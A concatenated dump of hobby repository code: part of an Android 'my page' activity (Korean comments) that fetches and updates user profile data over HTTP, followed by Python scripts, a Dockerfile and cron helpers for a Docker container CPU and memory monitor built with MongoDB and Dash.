OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(TAG, "InsertData: Error ", e);
return new String("Error: " + e.getMessage());
}
}
}
///////////////////////////----Delete AsyncTask 끝----////////////////////////////////
public class Json_Update extends AsyncTask<String,Void,String>{
private ProgressDialog Back_dialog = new ProgressDialog(MypageActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
Back_dialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
Back_dialog.setMessage("잠시만 기다려 주세요.");
Back_dialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Back_dialog.dismiss();
Log.e("Update_Post Value : ", res);
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text(res)
.show(MypageActivity.this);
}
@Override
protected String doInBackground(String... params) {
try {
for (int i = 0; i < 3; i++) {
Back_dialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
String usr_id = (String) params[0];
String usr_pw1 = (String) params[1];
String usr_pw2 = (String) params[2];
String usr_name = (String) params[3];
String usr_addr = (String) params[4];
String usr_phone = (String) params[5];
String usr_code = (String) params[6];
String server_URL = "http://192.168.127.12/hupdate.php";
String postParameters = "usr_id=" + usr_id + "&usr_pw1=" + usr_pw1 + "&usr_pw2=" + usr_pw2 + "&usr_name=" + usr_name + "&usr_addr=" + usr_addr + "&usr_phone="
+ usr_phone + "&usr_code=" + usr_code;
Log.e("Update_postParameters : ", postParameters);
try {
URL url = new URL(server_URL);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(TAG, "Update Data: Error ", e);
return new String("Error: " + e.getMessage());
}
}
}
///////////////////////////----Update AsyncTask 끝----////////////////////////////////
public class Json_select extends AsyncTask<String, Void, String> {
private ProgressDialog progressDialog = new ProgressDialog(MypageActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
// 프로그래스바를 이용
progressDialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
progressDialog.setMessage("잠시만 기다려 주세요.");
progressDialog.show();
}
@Override
protected String doInBackground(String... params) {
try {
for (int i = 0; i < 3; i++) {
progressDialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
// Login한 사용자를 얻기 위해서는 Intent로 사용자의 Id값을 전달 받아서 post방식으로 날리는 방식이 좋을 것 같다.
// -> MainActivity -> LoginActivity -> MypageActivity 순으로 Intent로 값을 전달해 주어 해결하였다.
// Login한 사용자의 정보를 서버 DB를 통해 받아와서 Mypage의 각각 EditText에 뿌려주는 역할을 하는 부분
// 인텐트로 값(아이디,비밀번호1,비밀번호2, 이름, 주소, 연락처, 코드번호)을 넘겨주고 MypageActivity에서 받는다.
// -> 이 방법은 상당히 비효율적이라 생각한다. MypageActivity에서 처리하도록 하자.
usr_id = (String) params[0]; // 사용자의 ID를 가져옴
usr_code = (String) params[1]; // 사용자의 CODE를 가져옴
return getJsonText();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
// 프로그래스바를 종료시킬 것
Log.e("모든 정보를 얻어 온다", res);
progressDialog.dismiss();
}
} // 서버 -> 안드로이드로 세밀하게 받아오기 위한 코드
public String getJsonText() {
StringBuffer sb = new StringBuffer();
try {
//주어진 URL 문서의 내용을 문자열로 얻는다.
String jsonPage = getStringFromUrl("http://5192.168.3.11/hselect.php");
//읽어들인 JSON포맷의 데이터를 JSON객체로 변환
JSONObject json = new JSONObject(jsonPage);
Log.e("json : ", json.toString());
Gson gson = new Gson();
String json_g = gson.toJson(json);
Log.e("Gson_name : ", json_g.substring(20, 24));
String str_1 = json_g.substring(20, 24);
if (str_1.equals("Code")) {
JSONArray jArr_code = json.getJSONArray("Code");
if (jArr_code != null) {
try {
for (int i = 0; i < jArr_code.length(); i++) {
json = jArr_code.getJSONObject(i);
// Json으로 서버에 저장되어있는 회원 정보를 불러오기 위함.
usr_id_json = json.getString("usr_id");
usr_pw_json = json.getString("usr_pw");
usr_pw_r_json = json.getString("usr_pw_r");
usr_name_json = json.getString("usr_name");
usr_addr_json = json.getString("usr_addr");
usr_phone_json = json.getString("usr_phone");
usr_code_json = json.getString("usr_code");
runOnUiThread(new Runnable() {
@Override
public void run() {
Mypage_ID.setText(usr_id_json);
Mypage_PW1.setText(usr_pw_json);
Mypage_PW2.setText(usr_pw_r_json);
Mypage_NAME.setText(usr_name_json);
Mypage_ADDR_Show.setText(usr_addr_json);
Mypage_PN.setText(usr_phone_json);
Mypage_CODE.setText(usr_code_json);
}
});
}
} catch (Exception e) {
Log.e("Error msg : ", e.toString());
}
}
Log.e("코드로 로그인 했다 ; ", json_g.substring(20, 24));
}
Log.e("Gson_name : ", json_g.substring(20, 28));
String str1 = json_g.substring(20, 28);
if (str1.equals("Userinfo")) {
JSONArray jArr_usr = json.getJSONArray("Userinfo");
if (jArr_usr != null) {
for (int i = 0; i < jArr_usr.length(); i++) {
json = jArr_usr.getJSONObject(i);
// Json으로 서버에 저장되어있는 회원 정보를 불러오기 위함.
usr_id_json = json.getString("usr_id");
usr_pw_json = json.getString("usr_pw");
usr_pw_r_json = json.getString("usr_pw_r");
usr_name_json = json.getString("usr_name");
usr_addr_json = json.getString("usr_addr");
usr_phone_json = json.getString("usr_phone");
usr_code_json = json.getString("usr_code");
runOnUiThread(new Runnable() {
@Override
public void run() {
Mypage_ID.setText(usr_id_json);
Mypage_PW1.setText(usr_pw_json);
Mypage_PW2.setText(usr_pw_r_json);
Mypage_NAME.setText(usr_name_json);
Mypage_ADDR_Show.setText(usr_addr_json);
Mypage_PN.setText(usr_phone_json);
Mypage_CODE.setText(usr_code_json);
}
});
}
}
Log.e("이 사람이다 ; ", json_g.substring(20, 28));
}
} catch (Exception e) {
e.printStackTrace();
}
return sb.toString();
}
// getStringFromUrl : 주어진 URL의 문서의 내용을 문자열로 반환
public String getStringFromUrl(String pUrl) {
String postParameters = "usr_id=" + usr_id + "&usr_code=" + usr_code;
try {
URL url = new URL(pUrl);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(ContentValues.TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
Log.d("my_data:", line);
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(ContentValues.TAG, "RecvData: Error ", e);
return new String("Error: " + e.getMessage());
}
}
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
switch (requestCode) { // startActivityForResult에서 넘긴 값을 처리하기 위함
case 0: // Daum에서 받은 주소 값을 받기 위함.
if (resultCode == RESULT_OK) {
str = data.getStringExtra("myaddr");
usr_addr_json=str;
Log.e("잘 받았어 고마워 : ", str);
runOnUiThread(new Runnable() {
@Override
public void run() {
Mypage_ADDR_Show.setText(str);
}});
}
break;
}
}
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) { // 뒤로 가기 버튼 클릭 시 종료 여부를 물어보기 위함
switch (keyCode) {
case android.view.KeyEvent.KEYCODE_BACK:
new AlertDialog.Builder(this)
.setTitle("알림")
.setMessage("종료하시겠습니까?")
.setPositiveButton("YES", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
finish();
}
})
.setNegativeButton("NO", null)
.show();
break;
default:
break;
}
return super.onKeyDown(keyCode, event);
}
} | 653343058b93301a8821dff5814d643fccc7663f | [
"Java"
] | 4 | Java | KiHwanHong/Smart_Hm | c09600e9837a5534ed49e06a8257f9934ff49a03 | 10e98b9ebca3f89add503ab2d9824823e9420d29 |
refs/heads/master | <file_sep>from pymongo import MongoClient
from datetime import datetime
import os
class mongoGuest:
def __init__(self):
self.collection = MongoClient(os.environ['DB_PORT_27017_TCP_ADDR'],27017)['test']['t']
def find_cpu_percentage(self,con):
cpu_usage = con["cpu_usage"]
system_usage = con["system_cpu_usage"]
precpu_usage= con["pre_cpu_usage"]
presystem_usage = con["presystem_usage"]
online_cpus = con["online_cpus"]
cpu_delta = (cpu_usage - precpu_usage)
system_delta = (system_usage - presystem_usage)
if cpu_delta >0.0 and system_delta > 0.0:
return (cpu_delta/system_delta) * online_cpus *100.0
else:
return 0.0
def changeHMS(self,time):
return time.strftime("%H:%M:%S")
def get_cpu_usage(self,cont_name,percent=False):
time = 1
timestamps = []
X = []
Y = []
for doc in self.collection.find():
timestamps.append(doc["time"])
timestamps.sort()
for ts_obj in timestamps:
doc = self.collection.find({'time':ts_obj})[0]
for con in doc['stats']:
if con['name'] == cont_name:
if percent==True:
Y.append(self.find_cpu_percentage(con))
else:
Y.append(con["cpu_usage"])
X.append(self.changeHMS(ts_obj))
#X.append(time)
time+=1
return (X,Y)
def get_memory_usage(self,cont_name):
time = 1
timestamps = []
X = []
Y = []
for doc in self.collection.find():
timestamps.append(doc["time"])
timestamps.sort()
for ts_obj in timestamps:
doc = self.collection.find({'time':ts_obj})[0]
for con in doc['stats']:
if con['name'] == cont_name:
Y.append(con['memory_usage'])
X.append(self.changeHMS(ts_obj))
#X.append(time)
time+=1
return (X,Y)
'''
def get_cpu_usage(self,cont_id,percent=False):
time = 1
X = []
Y = []
for doc in self.collection.find():
for con in doc['stats']:
if con['name'] == cont_id:
if percent==True:
Y.append(self.find_cpu_percentage(con))
else:
Y.append(con["cpu_usage"])
X.append(time)
time+=1
return (X,Y)
def get_memory_usage(self,cont_id):
time = 1
X = []
Y = []
for doc in self.collection.find():
for con in doc['stats']:
if con['name'] == cont_id:
Y.append(con['memory_usage'])
X.append(time)
time += 1
return (X,Y)
'''
<file_sep>FROM ubuntu:latest
RUN apt-get update && apt-get install -y cron
RUN apt-get install -y software-properties-common vim
RUN add-apt-repository ppa:jonathonf/python-3.6
RUN apt-get update
RUN apt-get install -y build-essential python3.6 python3.6-dev python3-pip python3.6-venv
RUN python3.6 -m pip install pip --upgrade
RUN python3.6 -m pip install wheel
WORKDIR /dbstore
ADD . /dbstore
RUN pip install -r requirements.txt
#ADD crontab /etc/cron.d/dbstore-cron
#RUN chmod 0644 /etc/cron.d/dbstore-cron
<file_sep>import dash
from dash.dependencies import Output,Input,Event
import dash_core_components as dcc
import dash_html_components as html
import plotly
import random
import plotly.graph_objs as go
from collections import deque
from pymongo import MongoClient
from time import sleep
import numpy as np
app = dash.Dash(__name__)
app.layout = html.Div(children=[
html.Div(children=[
html.Div(html.Button(id ='click-me',children='Click Me',className='btn btn-primary',n_clicks=0),className='col-md-1'),
#html.Div(id = 'put-graph-here',className='col-md-10'),
dcc.Graph(id = 'my-graph'),
],className='row')
],className='container')
'''
@app.callback(Output('put-graph-here','children'),
[Input('click-me','n_clicks')])
def draw_graph(n_clicks):
data = ''
if n_clicks > 0:
data = dcc.Graph(
id = 'my-graph',
figure = {
'data':go.Scatter(
x = np.arange(0,60),
y = np.random.randint(0,100),
type = 'Scatter',
mode = 'lines+markers'
),
'layout':go.Layout(title = 'My-graph')
})
return dcc.Graph(id = 'my-graph')
'''
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
'external_url': my_css_url
})
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>pymongo
docker
dash==0.21.0
dash-renderer==0.12.1
dash-html-components==0.10.0
dash-core-components==0.22.1
<file_sep>from datetime import datetime,timedelta
from pymongo import MongoClient
from pymongo.operations import DeleteOne,InsertOne
import docker
import json
from time import sleep
import os
import logging
import time
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
logger = logging.getLogger(__file__)
hdlr = logging.FileHandler(os.path.join(dir_path,'{}.log'.format(__file__.split('.')[0])))
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
class dockerGuest:
def __init__(self,config_file):
self.config_file=config_file
self.client = docker.APIClient(base_url = self.get_url(self.config_file))
def get_url(self,config_file):
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path,config_file)
config_data = json.load(open(file_path))
host = config_data["host"]
port = config_data["port"]
if host=="localhost" or host=="127.0.0.1":
return "unix://var/run/docker.sock" #local
else:
return "tcp://{}:{}".format(host,port) #remote
def container_list(self):
'''
Returning list of containers
'''
return self.client.containers()
def get_stats(self):
'''
Returning container stat list
'''
stat_list = []
container_list = self.container_list()
if len(container_list) == 0:
return None
for container in container_list:
_id = container['Id']
_dict = self.client.stats(container=_id,stream=False)
stat_dict = {}
stat_dict["_id"] = _id
stat_dict["name"] = _dict["name"][1:]
stat_dict["cpu_usage"] = _dict["cpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["system_cpu_usage"] = _dict["cpu_stats"]["system_cpu_usage"]
stat_dict["pre_cpu_usage"] = _dict["precpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["presystem_usage"]=_dict["precpu_stats"]["system_cpu_usage"]
online_cpus = _dict["cpu_stats"]["online_cpus"]
if online_cpus == 0.0:
online_cpus = len(_dict["cpu_stats"]["cpu_usage"]["percpu_usage"])
stat_dict["online_cpus"] = online_cpus
stat_dict["memory_usage"] = _dict["memory_stats"]["usage"]
stat_list.append(stat_dict)
return stat_list
class Stat:
def __init__(self,config_file):
self.docker = dockerGuest(config_file)
self.config_file = config_file
self.collection = MongoClient(os.environ['DB_PORT_27017_TCP_ADDR'],27017)['test'][self.get_collection()]
def get_collection(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path,self.config_file)
return json.load(open(file_path))["collection"]
def get_config_file(self):
return self.config_file
@staticmethod
def get_time():
time = datetime.now()
return time
#return time.strftime('%H:%M:%S')
def data_to_save(self):
stats = self.docker.get_stats()
if stats == None:
return None
global_stat_dict ={}
global_stat_dict["time"]=Stat.get_time()
global_stat_dict["stats"] = stats
return global_stat_dict
def save(self,cap=60):
new_data = self.data_to_save()
if self.collection.count() == cap:
top_doc_time = min(doc['time'] for doc in self.collection.find())
self.collection.delete_one({'time':top_doc_time})
self.collection.insert_one(new_data)
logger.info("Saved in DB...")
def save_to_db(self):
data = self.data_to_save()
if data != None:
if self.is_db_full():
self.make_space_db()
logger.info('DB Save')
self.collection.insert_one(data)
def make_space_db(self):
logger.info('Making space')
self.collection.delete_one({'_id':self.collection.find()[0]['_id']})
def is_db_full(self):
if self.collection.find({}).count() == 60:
return True
return False
def get_scheduled_job():
stat = Stat('config.json')
logger.info('Main Job')
stat.save()
get_scheduled_job()
<file_sep>import dash
from dash.dependencies import Output,Input,Event,State
import dash_core_components as dcc
import dash_html_components as html
import plotly
from dockerGuest import dockerGuest
import random
docker=dockerGuest()
app = dash.Dash(__name__)
def generate_graph():
return html.Table(
[html.Tr([html.Th('Name'),html.Th('Roll')])]+
[html.Tr([html.Td('<NAME>'),html.Td('12345')])]+
[html.Tr([html.Td('<NAME>'),html.Td('5666')])]
)
app.layout = html.Div([
html.H4('This is a table'),
generate_graph(),
],className='container')
#---------------Bootstrap CSS-------------------#
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
"external_url":my_css_url
})
#------------------------------------------------#
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>p=`which python`
echo $p
<file_sep>import dash
from dash.dependencies import Output,Input,Event,State
import dash_core_components as dcc
import dash_html_components as html
import plotly
import plotly.graph_objs as go
from mongoGuest import mongoGuest
from dockerGuest import dockerGuest
import random
docker=dockerGuest()
mongo = mongoGuest()
app = dash.Dash(__name__)
#---------------CSS Styling------------#
table_style = {
'borderCollapse':'collapse',
'width':'100%',
'fontSize':'20px'
}
tableh_style = {
'border':'1px solid #dddddd',
'padding':'8px',
'backgroundColor':'#F2F2F2',
}
tabled_style = {
'border':'1px solid #dddddd',
'padding':'8px',
}
#-------------------------------------#
#------------APP Layout-------------------------------------------#
def generate_table():
return html.Table(
[html.Tr([html.Th('Id'),html.Th('Image'),html.Th('IPAddress'),html.Th('Gateway')],style=tableh_style)]+
[html.Tr([dcc.Link(html.Td(con['Id']),href=con['Id']),html.Td(con['Image']),html.Td(con['IPAddress']),html.Td(con['Gateway'])],
style=tabled_style) for con in docker.get_cont_list()],className='table table-bordered',style=table_style
)
def serve_layout():
return html.Div([
html.Div([
dcc.Location(id='url',refresh=False),
html.Div([
html.H2('Containers',style={'color':'#FFFFFF'}),
],className='row',style={'textAlign':'center','backgroundColor':'#000000'}),
html.Div([
generate_table()
],className='row'),
],id='index-page'),
html.Div([
html.Div([
html.Div([
dcc.Graph(id='cpu-usage-graph'),
],id='cpu-usage',className='col-md-6'),
html.Div([
dcc.Graph(id='memory-usage-graph'),
],id='memory-usage',className='col-md-6')
],className='row'),
],id='graph-page',style={'display':'none'}),
],className='container')
app.layout = serve_layout
#---------------------------------------------------------#
@app.callback(Output('index-page','style'),
[Input('url','pathname')])
def vanish(pathname):
if len(pathname) > 1:
return {'display':'none'}
@app.callback(Output('graph-page','style'),
[Input('url','pathname')])
def appear(pathname):
if len(pathname)>1:
return {'display':'block'}
#------CPU Usage Graph generating callback-----------------#
def generate_cpu_data(cont_id):
return mongo.get_cpu_usage(cont_id)
@app.callback(Output('cpu-usage-graph','figure'),
[Input('url','pathname')])
def show_cpu_usage_graph(pathname):
if len(pathname):
X,Y = generate_cpu_data(pathname[1:])
data = go.Scatter(
x = X,
y = Y,
name='Scatter',
mode='lines+markers'
)
layout = go.Layout(
xaxis={'title':'Time','range':[min(X),max(X)]},
yaxis={'title':'CPU','range':[min(Y),max(Y)]},
)
return {'data':[data],'layout':layout}
#----------------------------------------------
#------Memory Usage Graph Generating Callback------#
def generate_memory_data(cont_id):
return mongo.get_memory_usage(cont_id)
@app.callback(Output('memory-usage-graph','figure'),
[Input('url','pathname')])
def show_memory_usage_graph(pathname):
if len(pathname)>1:
X,Y = generate_memory_data(pathname[1:])
data = go.Scatter(
x = X,
y = Y,
name='Scatter',
mode='lines+markers'
)
layout= go.Layout(
xaxis = {'title':'Time','range':[min(X),max(X)]},
yaxis = {'title':'Memory','range':[min(Y),max(Y)]},
)
return {'data':[data],'layout':layout}
#---------------------------------------------
#---------------Bootstrap CSS-------------------#
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
"external_url":my_css_url
})
#------------------------------------------------#
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>from dash.dependencies import Input,Output
import dash_html_components as html
import dash_core_components as dcc
from app import app
from apps import app1,app2
def generate_table():
return html.Table(
[html.Tr([html.Th('Name'),html.Th('Roll')])]+
[html.Tr([html.Td(dcc.Link('<NAME>',href='soham')),html.Td('34512')])]+
[html.Tr([html.Td(dcc.Link('<NAME>',href='ricky')),html.Td('461678')])]
)
app.layout = html.Div([
dcc.Location(id='url',refresh=False),
generate_table(),
html.Div(id='page-content'),
])
@app.callback(Output('page-content','children'),
[Input('url','pathname')])
def generate(pathname):
return html.H3('My name is {}'.format(pathname[1:]))
if __name__ =='__main__':
app.run_server(debug=True,host='0.0.0.0',port=8080)
<file_sep>import dash
import dash_html_components as html
import dash_core_components as dcc
from app import app
layout = html.Div([
html.H4('App 1'),
dcc.Link('Go to App 2',href='/apps/app2'),
dcc.Link('Go home',href = '/')
])
<file_sep>from datetime import datetime,timedelta
from pymongo import MongoClient
import docker
from time import sleep
class dockerGuest:
def __init__(self):
self.client = docker.APIClient(base_url = 'unix://var/run/docker.sock')
def container_list(self):
return self.client.containers()
def get_stats(self):
stat_list = []
container_list = self.container_list()
if len(container_list) == 0:
return None
for container in container_list:
_id = container['Id']
_dict = self.client.stats(container=_id,stream=False)
stat_dict = {}
stat_dict["_id"] = _id
stat_dict["name"] = _dict["name"][1:]
stat_dict["cpu_usage"] = _dict["cpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["system_cpu_usage"] = _dict["cpu_stats"]["system_cpu_usage"]
stat_dict["pre_cpu_usage"] = _dict["precpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["presystem_usage"]=_dict["precpu_stats"]["system_cpu_usage"]
online_cpus = _dict["cpu_stats"]["online_cpus"]
if online_cpus == 0.0:
online_cpus = len(_dict["cpu_stats"]["cpu_usage"]["percpu_usage"])
stat_dict["online_cpus"] = online_cpus
stat_dict["memory_usage"] = _dict["memory_stats"]["usage"]
stat_list.append(stat_dict)
return stat_list
class Stat:
timestamp = 1
def __init__(self):
self.docker = dockerGuest()
self.client = MongoClient()
self.db = self.client.test
self.file = '/home/sohdatta/my-gcc-app/myproject/project/test'
@staticmethod
def get_time():
time = datetime.now()
return time.strftime('%H:%M:%S')
def data_to_save(self):
stats = self.docker.get_stats()
if stats == None:
return None
global_stat_dict ={}
global_stat_dict["time"]=Stat.get_time()
global_stat_dict["stats"] = stats
return global_stat_dict
def save_to_db(self):
data = self.data_to_save()
f = open(self.file,'a+')
f.write('saved')
if data != None:
self.db.timestamp.insert_one(data)
f.close()
def make_space_db(self):
f = open(self.file,'a+')
f.write('full ')
self.db.timestamp.delete_one({'_id':self.db.timestamp.find()[0]['_id']})
f.close()
def is_db_full(self):
if self.db.timestamp.find({}).count() == 60:
return True
return False
def get_scheduled_job():
#f = open('/home/sohdatta/my-gcc-app/myproject/project/test','a+')
stat = Stat()
if stat.is_db_full():
stat.make_space_db()
stat.save_to_db()
if __name__ == '__main__':
get_scheduled_job()
'''
def main():
docker = docker.APIClient(base_url='unix://var/run/docker.sock')
client = MongoClient()
db = client.test
for i in range(7):
docker.create_container('my-gcc-app',detach=True)
docker.run_containers()
for stat in docker.generate_stats():
global_stat_dict={} #document in mongodb
global_stat_dict["time"]=get_time()
stat_list = []
for stat_container in stat:
stat_dict = {}
_id = stat_container["id"]
name=stat_container["name"]
cpu_usage= stat_container["cpu_stats"]["cpu_usage"]["total_usage"]
memory_usage=stat_container["memory_stats"]["usage"]
stat_dict["id"]=_id
stat_dict["name"]=name
stat_dict["cpu_usage"]=cpu_usage
stat_dict["memory_usage"]=memory_usage
stat_list.append(stat_dict)
global_stat_dict["stat_list"] = stat_list
db.test_table.insert_one(global_stat_dict) #storing each document in test_table collection
pprint(global_stat_dict,width=1)
if __name__ == '__main__':
main()
'''
<file_sep>file_path=$PWD/"dbstore.py"
py=`which python`
command="$py $file_path"
crontab -l > mycron
echo "*/1 * * * * $command" >> mycron
crontab mycron
rm mycron
<file_sep>import dash
import dash_html_components as html
import dash_core_components as dcc
from app import app
layout = html.Div([
html.H4('App 2'),
dcc.Link('Go to App 1',href='/apps/app1'),
dcc.Link('Go home',href = '/')
])
<file_sep>from pymongo import MongoClient
class mongoGuest:
def __init__(self):
self.db = MongoClient().test
def find_cpu_percentage(self,con):
cpu_usage = con["cpu_usage"]
system_usage = con["system_cpu_usage"]
precpu_usage= con["pre_cpu_usage"]
presystem_usage = con["presystem_usage"]
online_cpus = con["online_cpus"]
cpu_delta = (cpu_usage - precpu_usage)
system_delta = (system_usage - presystem_usage)
if cpu_delta >0.0 and system_delta > 0.0:
return (cpu_delta/system_delta) * online_cpus *100.0
else:
return 0.0
def get_cpu_usage(self,cont_id,percent=False):
time = 1
X = []
Y = []
for doc in self.db.timestamp.find():
for con in doc['stats']:
if con['name'] == cont_id:
if percent==True:
Y.append(self.find_cpu_percentage(con))
else:
Y.append(con["cpu_usage"])
X.append(time)
time+=1
return (X,Y)
def get_memory_usage(self,cont_id):
time = 1
X = []
Y = []
for doc in self.db.timestamp.find():
for con in doc['stats']:
if con['name'] == cont_id:
Y.append(con['memory_usage'])
X.append(time)
time += 1
return (X,Y)
<file_sep>from datetime import datetime,timedelta
from pymongo import MongoClient
import docker
from time import sleep
class dockerGuest:
def __init__(self):
self.client = docker.APIClient(base_url = 'unix://var/run/docker.sock')
def container_list(self):
return self.client.containers()
def get_stats(self):
stat_list = []
container_list = self.container_list()
if len(container_list) == 0:
return None
for container in container_list:
_id = container['Id']
_dict = self.client.stats(container=_id,stream=False)
stat_dict = {}
stat_dict["_id"] = _id
stat_dict["name"] = _dict["name"][1:]
stat_dict["cpu_usage"] = _dict["cpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["memory_usage"] = _dict["memory_stats"]["usage"]
stat_list.append(stat_dict)
return stat_list
class Stat:
def __init__(self):
self.docker = dockerGuest()
self.client = MongoClient()
self.db = self.client.test
@staticmethod
def get_time():
t = datetime.now() + timedelta(hours=5,minutes=30)
return t.strftime("%H:%M:%S")
def data_to_save(self):
stats = self.docker.get_stats()
if stats == None:
return None
global_stat_dict ={}
global_stat_dict["time"]=Stat.get_time()
global_stat_dict["stats"] = stats
return global_stat_dict
def save_to_db(self):
data = self.data_to_save()
if data != None:
self.db.timestamp.insert_one(data)
def make_space_db(self):
self.db.timestamp.delete_one({'_id':db.timestamp.find()[0]['_id']})
def is_db_full(self):
if self.db.timestamp.find({}).count() == 60:
return True
return False
def get_scheduled_job():
stat = Stat()
if stat.is_db_full():
stat.make_space_db()
stat.save_to_db()
if __name__ == '__main__':
get_scheduled_job()
'''
def main():
docker = docker.APIClient(base_url='unix://var/run/docker.sock')
client = MongoClient()
db = client.test
for i in range(7):
docker.create_container('my-gcc-app',detach=True)
docker.run_containers()
for stat in docker.generate_stats():
global_stat_dict={} #document in mongodb
global_stat_dict["time"]=get_time()
stat_list = []
for stat_container in stat:
stat_dict = {}
_id = stat_container["id"]
name=stat_container["name"]
cpu_usage= stat_container["cpu_stats"]["cpu_usage"]["total_usage"]
memory_usage=stat_container["memory_stats"]["usage"]
stat_dict["id"]=_id
stat_dict["name"]=name
stat_dict["cpu_usage"]=cpu_usage
stat_dict["memory_usage"]=memory_usage
stat_list.append(stat_dict)
global_stat_dict["stat_list"] = stat_list
db.test_table.insert_one(global_stat_dict) #storing each document in test_table collection
pprint(global_stat_dict,width=1)
if __name__ == '__main__':
main()
'''
<file_sep>from django.db import models
from mongoengine import *
# Create your models here.
class Container(EmbeddedDocument):
_id = StringField(required=True)
name = StringField(required=True)
cpu_usage = StringField(required=True)
memory_usage = StringField(required=True)
class Timestamp(Document):
time = StringField(required=True)
stats = ListField(EmbeddedDocumentField(Container))
<file_sep>from pymongo import MongoClient
import random
db = MongoClient().test
def get_random_time():
hour = str(random.randint(0,24))
minute = str(random.randint(0,60))
second = str(random.randint(0,60))
return hour +":" + minute+":"+second
def get_random_number():
return random.randint(0,100)
def check_time(time):
time = time.split(":")
hour = int(time[0])
minute= int(time[1])
second= int(time[2])
#print(hour,minute,second)
return (hour,minute,second)
def main():
random_time=[]
for _ in range(1000):
random_time.append(get_random_time())
random_time = sorted(random_time,key=check_time)
for i in range(1000):
data = {}
data['time']=random_time[i]
data['value']=get_random_number()
db.timestampdata.insert_one(data)
#print(random_time[0:50])
if __name__ =='__main__':
main()
<file_sep>from crontab import CronTab
import os
class CTab:
def __init__(self,username=None):
self.cron = CronTab(user=username)
def print_job(self,comment=None):
'''
Args:
comment:To print a specific job
'''
if comment:
print('The Job is...')
for job in self.cron:
if job.comment == comment:
print(job)
else:
print('All the jobs are..')
for job in self.cron:
print(job)
def add_job(self,command,interval,comment=None):
'''
Args:
command: command that the job will execute,
interval: every minute,
comment: a comment for the job(Optional
but recommended)
'''
job = self.cron.new(command=command,comment=comment)
job.minute.every(interval)
self.cron.write()
print('Job added successfully...')
def remove_job(self,comment=None):
'''
Args:
comment: To remove specific job
'''
if comment:
